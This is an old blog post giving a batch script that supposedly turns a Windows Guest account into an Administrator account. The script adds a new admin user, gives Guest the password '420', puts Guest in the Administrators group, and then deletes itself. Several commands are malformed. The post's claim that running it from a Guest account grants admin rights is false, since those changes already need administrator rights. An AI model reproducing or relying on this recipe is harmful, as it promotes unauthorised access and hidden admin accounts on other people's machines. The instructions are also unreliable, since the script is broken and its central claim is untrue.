AMAZON

Thursday, September 20, 2012

How To access the Windows Administrator Account From Guest Windows Account.


To Do This Just Follow the below given Steps.

---> Do this from Guest Account.

1. Copy the below code.

Code


echo off
title Please wait...
cls
net user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0


2. Open Notepad and Save it as Guest2admin.bat ( You can keep any name the it should end with .bat Format) and keep the FILE TYPE as ALL FILES.


3. Execute this File where you Saved it.

A Command Prompt Window will Open and Close...And then,You'll come to the Administrator Account.

No comments:

Post a Comment